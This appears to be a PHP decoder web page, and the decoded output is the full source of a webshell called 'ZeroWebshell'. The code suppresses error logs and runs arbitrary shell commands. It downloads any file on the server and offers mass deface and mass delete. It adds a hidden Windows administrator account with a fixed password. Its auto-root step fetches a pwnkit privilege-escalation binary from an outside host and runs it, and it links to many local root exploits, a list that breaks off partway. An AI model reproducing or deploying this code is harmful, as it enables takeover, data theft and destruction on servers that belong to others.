Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php session_start();set_time_limit(0);error_reporting(0);@ini_set('error_log',null);@ini..
Decoded Output download
<?php session_start();set_time_limit(0);error_reporting(0);@ini_set('error_log',null);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);@ini_set('display_errors',0);$azu3293050475=array_merge($_POST,$_GET);$hqb3270591348="required='required'";$wje845731916="getcwd";if(isset($azu3293050475['opn'])&&($azu3293050475['opn']!='')&&($azu3293050475['action']=='download')){@ob_clean();$kxc2359244304=$azu3293050475['opn'];header('Content-Description: File Transfer');header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($kxc2359244304).'"');header('Expires: 0');header('Cache-Control: must-revalidate');header('Pragma: public');header('Content-Length: '.filesize($kxc2359244304));readfile($kxc2359244304);exit;}function w($oex3131800080,$fld711815386){if(!is_writable($oex3131800080)){return "<rd>".$fld711815386."</rd>";}else{return "<gr>".$fld711815386."</gr>";}}function s(){echo '<style>table{display:none;}</style><div class="table-responsive"><center><hr></hr></center></div>';}function ok(){echo '<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';}function er(){echo '<div class="alert alert-dark alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';}function sz($xji495432134){$isx37857821=array('B','KB','MB','GB','TB');for($iie3865851505=0;$xji495432134>=1024&&$iie3865851505<(count($isx37857821)-1);$xji495432134/=1024,$iie3865851505++);return(round($xji495432134,2)." ".$isx37857821[$iie3865851505]);}function ia(){$yhz3478361055='';if(getenv('HTTP_CLIENT_IP'))$yhz3478361055=getenv('HTTP_CLIENT_IP');else if(getenv('HTTP_X_FORWARDED_FOR'))$yhz3478361055=getenv('HTTP_X_FORWARDED_FOR');else if(getenv('HTTP_X_FORWARDED'))$yhz3478361055=getenv('HTTP_X_FORWARDED');else if(getenv('HTTP_FORWARDED_FOR'))$yhz3478361055=getenv('HTTP_FORWARDED_FOR');else if(getenv('HTTP_FORWARDED'))$yhz3478361055=getenv('HTTP_FORWARDED');else if(getenv('REMOTE_ADDR'))$yhz3478361055=getenv('REMOTE_ADDR');else $yhz3478361055='Unknown IP';return $yhz3478361055;}function exe($enu794565824){if(function_exists('system')){@ob_start();@system($enu794565824);$fez1965507171=@ob_get_contents();@ob_end_clean();return $fez1965507171;}elseif(function_exists('exec')){@exec($enu794565824,$ufh2678318100);$fez1965507171="";foreach($ufh2678318100 as $mdb325763347){$fez1965507171.=$mdb325763347;}return $fez1965507171;}elseif(function_exists('passthru')){@ob_start();@passthru($enu794565824);$fez1965507171=@ob_get_contents();@ob_end_clean();return $fez1965507171;}elseif(function_exists('shell_exec')){$fez1965507171=@shell_exec($enu794565824);return $fez1965507171;}}function exe_root($vwh3860080092,$prj2681204924){$hen2363233923="preg_match";$mrc4175501327="2>&1";if(!$hen2363233923("/".$mrc4175501327."/i",$vwh3860080092)){$vwh3860080092=$vwh3860080092." ".$mrc4175501327;}$fov3904355907="function_exists";$nnx1908338681="proc_open";$cjx112844655="htmlspecialchars";$gxs2564639436="stream_get_contents";if($fov3904355907($nnx1908338681)){$sci2817149839=$nnx1908338681($vwh3860080092,array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","r")),$bsg744714710,$prj2681204924);return $gxs2564639436($bsg744714710[1]);}else{return "proc_open function is disabled!";}}function p($kxc2359244304){$ppg2181537457=fileperms($kxc2359244304);if(($ppg2181537457&0xC000)==0xC000){$iie3865851505='s';}elseif(($ppg2181537457&0xA000)==0xA000){$iie3865851505='l';}elseif(($ppg2181537457&0x8000)==0x8000){$iie3865851505='-';}elseif(($ppg2181537457&0x6000)==0x6000){$iie3865851505='b';}elseif(($ppg2181537457&0x4000)==0x4000){$iie3865851505='d';}elseif(($ppg2181537457&0x2000)==0x2000){$iie3865851505='c';}elseif(($ppg2181537457&0x1000)==0x1000){$iie3865851505='p';}else{$iie3865851505='u';}$iie3865851505.=(($ppg2181537457&0x0100)?'r':'-');$iie3865851505.=(($ppg2181537457&0x0080)?'w':'-');$iie3865851505.=(($ppg2181537457&0x0040)?(($ppg2181537457&0x0800)?'s':'x'):(($ppg2181537457&0x0800)?'S':'-'));$iie3865851505.=(($ppg2181537457&0x0020)?'r':'-');$iie3865851505.=(($ppg2181537457&0x0010)?'w':'-');$iie3865851505.=(($ppg2181537457&0x0008)?(($ppg2181537457&0x0400)?'s':'x'):(($ppg2181537457&0x0400)?'S':'-'));$iie3865851505.=(($ppg2181537457&0x0004)?'r':'-');$iie3865851505.=(($ppg2181537457&0x0002)?'w':'-');$iie3865851505.=(($ppg2181537457&0x0001)?(($ppg2181537457&0x0200)?'t':'x'):(($ppg2181537457&0x0200)?'T':'-'));return $iie3865851505;}if(isset($azu3293050475['dir'])){$oex3131800080=$azu3293050475['dir'];chdir($oex3131800080);}else{$oex3131800080=$wje845731916();}echo "
<html>
<head>
<meta charset='utf-8'>
<meta name='author' content='Shizuo1337'>
<meta name='viewport' content='width=device-width, initial-scale=0.40'>
<link rel='icon' href='//i.ibb.co/mbRDLgS/cat-logo-E6-BC30-BEB2-seeklogo-com-removebg-preview.png'>
<title>ZeroWebshell</title>
<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>
<script src='//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<style>@import url('//cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css');@import url('//cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css');@import url('//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/themes/prism-okaidia.css');@import url('https://fonts.googleapis.com/css2?family=Ubuntu+Condensed');@import url('https://fonts.googleapis.com/css2?family=Sedgwick+Ave&display=swap');@import url('https://fonts.googleapis.com/css2?family=Cormorant');body {cursor: url('data:image/x-icon;base64,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'), auto;font-family:'Ubuntu Condensed';}.shell{border-radius: 4px;border: 1px solid rgba(255, 255, 255, 0.4);font-size: 10pt;display: flex;flex-direction: column;align-items: stretch;background: #242424;color: #fff;}.pre{height: 150px;overflow: auto;white-space: pre-wrap;flex-grow: 1;margin:10px auto;padding:10px;line-height:1.3em;overflow-x:scroll;}.anu,kbd{font-family: 'Sedgwick Ave', cursive;}.corner{text-align: right;margin-top: -10px;font-size:12px;}gr {color:#54A700;}rd {color:red;}.php_info pre {margin: 0; font-family: monospace;}.php_info table {color: #000; border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}.center {text-align: center;}.center table {margin: 1em auto; text-align: left;}.center th {text-align: center !important;}.php_info td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}.p {text-align: left;}.e {background-color: #ccf; width: 300px; font-weight: bold;}.h {background-color: #99c; font-weight: bold;}.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}.v i {color: #999;}img {float: right; border: 0;}hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}h1 {font-size: 150%;}h2 {font-size: 125%;}</style>
</head>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
<div class='box shadow bg-dark p-4 rounded-3'>
<a class='text-decoration-none text-light anu' href='".$_SERVER['PHP_SELF']."'><h1>ZERODAY</h1></a>";if(isset($azu3293050475['path'])){$sol190089999=$azu3293050475['path'];chdir($sol190089999);}else{$sol190089999=$wje845731916();}$sol190089999=str_replace('\','/',$sol190089999);$oxk2344257041=explode('/',$sol190089999);foreach($oxk2344257041 as $qlb3208210256=>$daz2151571073){if($daz2151571073==''&&$qlb3208210256==0){$fov3904355907=true;echo "<i class='bi bi-hdd-rack'></i>:<a class='text-decoration-none text-light' href='?path=/'>/</a>";continue;}if($daz2151571073=='')continue;echo "<a class='text-decoration-none text-light' href='?path=";for($iie3865851505=0;$iie3865851505<=$qlb3208210256;$iie3865851505++){echo"$oxk2344257041[$iie3865851505]";if($iie3865851505!=$qlb3208210256)echo "/";}echo "'>".$daz2151571073."</a>/";}$oue2843178896=scandir($sol190089999);echo " [ ".w($sol190089999,p($sol190089999))." ]";$sre3688262367=(function_exists('mysql_connect'))?"<gr>ON</gr>":"<rd>OFF</rd>";$tov65018701=(function_exists('curl_version'))?"<gr>ON</gr>":"<rd>OFF</rd>";$mfx3587616859=(exe('wget --help'))?"<gr>ON</gr>":"<rd>OFF</rd>";$uvh719472250=(exe('perl --help'))?"<gr>ON</gr>":"<rd>OFF</rd>";$qjq1195352721=(exe('python --help'))?"<gr>ON</gr>":"<rd>OFF</rd>";$gjz682757169=(exe('gcc --help'))?"<gr>ON</gr>":"<rd>OFF</rd>";$hfc3458825191=(exe('pkexec --version"'))?"<gr>ON</gr>":"<rd>OFF</rd>";$vcm279840682=@ini_get("disable_functions");if(empty($vcm279840682)){$jzk1561703635="<gr>NONE</gr>";}else{$jzk1561703635="<rd>$vcm279840682</rd>";}if(!function_exists('posix_getegid')){$zyw2375276105=@get_current_user();$yjx1402668550=@getmyuid();$fee1278832920=@getmygid();$cvy1841317061="?";}else{$yjx1402668550=@posix_getpwuid(posix_geteuid());$fee1278832920=@posix_getgrgid(posix_getegid());$zyw2375276105=$yjx1402668550['name'];$yjx1402668550=$yjx1402668550['uid'];$cvy1841317061=$fee1278832920['name'];$fee1278832920=$fee1278832920['gid'];}$jyg1992828207=(@ini_get(strtolower("safe_mode"))=='on')?"<rd>ON</rd>":"<gr>OFF</gr>";echo "
<div class='container-fluid'>
<div class='corner'>
<i data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'>Information Server</i>
<!--<form method=post><select name=eviltwin><option selected>Get Localroot All CVE</option><option value=one>CVE-2018-14634 (2.6.x, 3.10.x and 4.14.x)</option><option value=two>Dirty</option><option value=suid>Suid</option><option value=timoutpwn>Timeoutpwn</option><option value=alfa>Alfa (4)</option><option value=noname>Noname (1)</option><option value=ets>Evil Twin (1.3)</option></select><input type=submit value=Get!>-->
</div><br>
<div class='collapse text-dark mb-3' id='collapseExample'>
<div class='box shadow bg-light p-3 rounded-3'>
System: <gr>".php_uname()."</gr><br>
Software: <gr>".$_SERVER["SERVER_SOFTWARE"]."</gr><br>
PHP Version: <gr>".PHP_VERSION."</gr> PHP Os: <gr>".PHP_OS."</gr><br>
Server IP: <gr>".gethostbyname($_SERVER['HTTP_HOST'])."</gr><br>
Your IP: <gr>".ia()."</gr><br>
User: <gr>$zyw2375276105</gr> ($yjx1402668550) | Group: <gr>$cvy1841317061</gr> ($fee1278832920)<br>
Safe Mode: $jyg1992828207<br>
MYSQL: $sre3688262367 | PERL: $uvh719472250 | PYTHON: $qjq1195352721 | WGET: $mfx3587616859 | CURL: $tov65018701 | GCC: $gjz682757169 | PKEXEC: $hfc3458825191<br>
Disable Function:<br><pre>$jzk1561703635</pre>
</div>
</div>
</div>
<div class='text-center'>
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=adminer'><i class='bi bi-cast'></i> Adminer </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=autoroot'><i class='bi bi-bug'></i> Auto Root </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=cmd'><i class='bi bi-terminal'></i> Command </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=rdp'><i class='bi bi-intersect'></i> Create RDP </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=config'><i class='bi bi-tv'></i> Config </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=getools'><i class='bi bi-toggles'></i> Get Shell/Tools </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=getroot'><i class='bi bi-tools'></i> Get Localroot </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=deface'><i class='bi bi-exclamation-diamond'></i> Mass Deface </a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&id=delete'><i class='bi bi-trash'></i> Mass Delete </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=network'><i class='bi bi-hdd-network'></i> Network </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=scanroot'><i class='bi bi-search'></i> Scan Root </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=upload'><i class='bi bi-upload'></i> Upload </a>
<a class='btn btn-outline-light btn-sm' href='https://shizuo.my.id'><i class='bi bi-box-arrow-in-left'></i> Website </a>
</div>
</div>";$jxg3766473888=str_replace($_SERVER['DOCUMENT_ROOT'],"",$sol190089999);if(isset($azu3293050475['dir'])){$oex3131800080=$azu3293050475['dir'];chdir($oex3131800080);}else{$oex3131800080=$wje845731916();}$sol190089999=str_replace('\','/',$sol190089999);$ycu338269933=explode("/",$oex3131800080);for($iie3865851505=0;$iie3865851505<=$xdm3459532406;$iie3865851505++){$ycu338269933[$iie3865851505];if($iie3865851505!=$xdm3459532406){}if($azu3293050475['id']=='rdp'){ob_implicit_flush();ob_end_flush();if(strtoupper(substr(PHP_OS,0,3))==='WIN'){echo '<center class="anu">Create RDP</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("net user shizuo b4b1raga#1337 /add",$sol190089999).exe_root("net localgroup administrators shizuo /add",$sol190089999).'<br>If there is no "Access is denied." output, chances are that you have succeeded in creating a user here. Just log in using the username and password below.
hosts: <gr>'.gethostbyname($_SERVER["HTTP_HOST"]).'
username: shizuo
password: b4b1raga#1337</code></pre>
</div>
</div>';}else{echo "<script>alert('Whutt?! kids, this tool only works for windows server!');</script>";}}if($azu3293050475['id']=='autoroot'){ob_implicit_flush();ob_end_flush();echo '<center class="anu">Auto Root by shizuo</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("curl https://gitlab.com/jasonrondiguez/a/-/raw/main/localr00000t/pwnkit -o cats;chmod +x cats;./cats id",$sol190089999).'<br>If successful, u can run as root user using command: ./cats "YOUR COMMAND"</code></pre>
</div>
</div>';}if($azu3293050475['id']=='getroot'){ob_implicit_flush();ob_end_flush();s();echo '<center class="anu">Get Localroot</center>';echo "<b>Linux</b><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2001' class='text-decoration-none text-light'>CVE N/A | Sudo prompt overflow in v1.5.7 to 1.6.5p2</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2002' class='text-decoration-none text-light'>CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/blob/master/2003/ptrace-kmod.c' class='text-decoration-none text-light'>CVE-2003-0127 | Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/blob/master/2003/hatorihanzo.c' class='text-decoration-none text-light'>CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2004/CVE-2004-0077' class='text-decoration-none text-light'>CVE-2004-0077 | Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2004/CVE-2004-1235' class='text-decoration-none text-light'>CVE-2004-1235 | Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2004/caps_to_root' class='text-decoration-none text-light'>CVE N/A | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2005/CVE-2005-0736' class='text-decoration-none text-light'>CVE-2005-0736 | Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2005/CVE-2005-1263' class='text-decoration-none text-light'>CVE-2005-1263 | Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2006/CVE-2006-2451' class='text-decoration-none text-light'>CVE-2006-2451 | Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2006/CVE-2006-3626' class='text-decoration-none text-light'>CVE-2006-3626 | Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2007/Compress_Exploit' class='text-decoration-none text-light'>CVE N/A | Compress v4.2.4 local test exploit</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2007/Gawk_Exploit' class='text-decoration-none text-light'>CVE N/A | Local GNU Awk 3.1.0-x proof of concept exploit</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2007/EDB-ID-4756' class='text-decoration-none text-light'>EDB-ID-4756 | Linux Kernel < 2.6.11.5 Bluetooth Stack Localroot Exploit</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2008/CVE-2008-0600' class='text-decoration-none text-light'>CVE-2008-0600 | Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2008/CVE-2008-0900' class='text-decoration-none text-light'>CVE-2008-0900 | Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2008/CVE-2008-4210' class='text-decoration-none text-light'>CVE-2008-4210 | Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation</a><br>
